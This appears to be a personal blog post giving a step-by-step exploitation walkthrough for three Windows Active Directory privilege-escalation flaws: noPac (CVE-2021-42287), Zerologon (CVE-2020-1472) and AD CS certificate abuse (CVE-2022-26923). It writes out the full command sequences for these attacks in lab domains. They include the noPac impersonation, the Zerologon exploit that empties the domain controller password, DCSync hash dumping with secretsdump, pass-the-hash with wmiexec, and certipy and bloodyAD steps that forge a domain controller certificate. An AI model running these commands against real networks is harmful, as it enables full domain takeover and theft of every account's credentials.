banner
B1ueD0g

BlueDog's Home

上班使我怨气比鬼重!
x
telegram
email

Lateral Movement - Some Insights on Domain Controller Privilege Escalation

CVE-2021-42287#

Due to Active Directory not validating computer and server accounts in the domain, authenticated attackers can exploit this vulnerability to bypass complete restrictions, allowing them to elevate the permissions of ordinary domain users to domain administrator privileges and execute arbitrary code.

Exploitation Conditions#

Prerequisites: An ordinary account within the domain
Affected Versions: Almost the entire Windows series

Vulnerability Reproduction#

Image The current scenario is as follows: we have obtained the host permissions of the Web Server and the account and password of the domain member webadmin, to use the CVE-2021-42287 vulnerability to attack the domain controller host. Here we can use the nopac script for exploitation. Before the attack, bind the domain name and IP address in the hosts file. Image

Check for the existence of the vulnerability

noPac.exe scan -domain god.org -user webadmin -pass admin!@#45

The vulnerability exists. Next, we use the TGT of the ordinary domain user to exploit the vulnerability and request TGS for the domain controller machine account's cifs service ST credential.

Image

noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org --impersonate administrator -dump -use-ldap

After generating the ticket, we check the tickets present on the current computer.

klist 

Image

We find a ticket established with the domain controller, and we can directly use psexec to connect.

PsExec \\owa2010cn-god.god.org cmd

Image

CVE-2020-1472#

CVE-2020-1472 is one of the most severe remote privilege escalation vulnerabilities in Windows domain controllers. Attackers can exploit this vulnerability to gain domain admin access by establishing a vulnerable secure channel with the domain controller through NetLogon.

First, obtain the computer name of the domain controller.

net group "domain controllers" /domain

Image Then use a test script to check if the domain controller has the vulnerability.

python zerologon_tester.py owa2010cn-god 192.168.3.21

Image

Then use the exploit to connect to the DC and clear the credentials.

python cve-2020-1472-exploit.py OWA2010CN-GOG 192.168.3.21

Image

After execution, the DC's password will be cleared, and we can then connect with an empty password to export the hashes within the domain.

secretsdump.exe "god.org/owa2010cn-god$@192.168.3.21" -no-pass

Image

At this point, we use the domain controller's hash to perform a Pass-the-Hash (PTH) connection to gain domain controller privileges.

wmiexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/admin

Image

CVE-2022-26923#

This vulnerability allows low-privileged users to elevate their privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed. There are now very few medium to large Active Directory environments that do not have AD CS installed, making this vulnerability both dangerous and exploitable.

Exploitation Conditions#

Prerequisites:

  1. An ordinary account within the domain
  2. A certificate server exists within the domain

Affected Versions: Windows 8.1, Windows 10, Windows 11, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, etc.

Environment Setup#

First, prepare a host with domain services set up, here we choose Windows Server 2012 R2. Since this vulnerability is based on certificate services, Active Directory Certificate Services must be installed on the DC. Click to add roles and features, proceed with the default steps until the following image, and select to install Active Directory Certificate Services: Image Proceed to the role services, check Certificate Authority, Certificate Authority Web Enrollment, and Certificate Enrollment Policy Web Service! Image Click install! Image

After installation, configure Active Directory Certificate Services by clicking that option in Server Manager. Image Select the three services checked during installation and proceed to the CA name! Image After configuring the CA certificate, proceed to the server certificate! Image In the server certificate, select the certificate and assign it for SSL later, click next! Image Proceed to configure! Image Check if the configuration was successful: Check if there are certificate templates in the Certificate Authority! Image The exploitation condition for this vulnerability is to obtain an ordinary user permission within the domain, so a user needs to be created on the DC, and this user's credentials will be used for domain controller privilege escalation operations. Image

Vulnerability Exploitation#

Obtain CA Name#

Currently, our known information is:

Domain Controller: Win 2012
    IP: 192.168.45.152
    Hostname: DC-2012
Domain: tidesec.local
User: test/Pass123

Next, the first step is to obtain the CA name within the domain.

  1. Query from any domain host
 Check if there is a certificate drive
Get-PSDrive cert | ft -AutoSize

 List the certificates of local machine accounts
Get-ChildItem Cert:\LocalMachine\Root

Image

  1. Query on the domain controller
certutil
certutil -config - -ping

ImageImage 3. Reasonable Guess Based on the domain controller hostname and domain name

Domain Controller Hostname: DC-2012
Domain Name: tidesec.local
CA Name: tidesec-DC-2012-CA

Apply for Certificate#

Before applying for a certificate, we need to modify the hosts file of our attacking machine to correspond the domain name and IP address.

vim /etc/hosts
192.168.45.152 tidesec.local
192.168.45.152 tidesec-DC-2012-CA
192.168.45.152 DC-2012.tidesec.local

Image Here we need to use the certipy tool, and install it before use.

python3 setup.py install

Image After installation, use the low-privileged user, CA name, and domain controller computer name we just obtained to generate a certificate.

certipy req tidesec.local'test:Pass123'@DC-2012.tidesec.local -ca tidesec-DC-2012-CA -template User

Image Successfully applied for the ceshi user certificate account, execute the command to verify the certificate and obtain its NT hash value.

certipy auth -pfx test.pfx

Image Successfully obtained the NT hash, indicating that the test environment is fine. Next, we need to use bloodyAD to create a machine account. Before creating the account, we first observe that there are no accounts under Computers on the current domain controller. Image Next, create one.

 python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 addComputer test2 'Test12345' 

Image Now observe that a test2 machine account has been successfully added to the domain controller. Image Next, set its dNSHostName attribute to the domain controller server attribute.

python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 setAttribute 'CN=test2,CN=Computers,DC=tidesec,DC=local' dNSHostName '["DC-2012.tidesec.local"]'

ImageImage Next, we use the newly created machine account test2 to apply for a certificate, which is actually applying for the domain controller DC$ certificate.

certipy req 'tidesec.local/test2$:Test12345@192.168.45.152' -template Machine -dc-ip 192.168.45.152 -ca tidesec-DC-2021-CA

Image At this point, the certificate is not test.pfx, but the hostname dc-2012.pfx, which is issued for the domain controller's computer account certificate. Next, we use this certificate for authentication, and the Certipy tool retrieves the NTLM hash of DC-2012$.

certipy auth -pfx dc-2012.pfx -dc-ip 192.168.45.152

Image Then we can use the secretsdump.py script from the impacket toolkit to perform a DCSync attack and export the domain user hashes.

python3 secretsdump.py 'tidesec.local/DC-2012$@DC-2012.tidesec.local' -hashes :20d4bd2f70725811f4e39fe77166e00b

Image After that, use the wmiexec.py script to gain execution privileges for the domain controller account.

python3 wmiexec.py tidesec.local/administrator@192.168.45.152 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

Image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.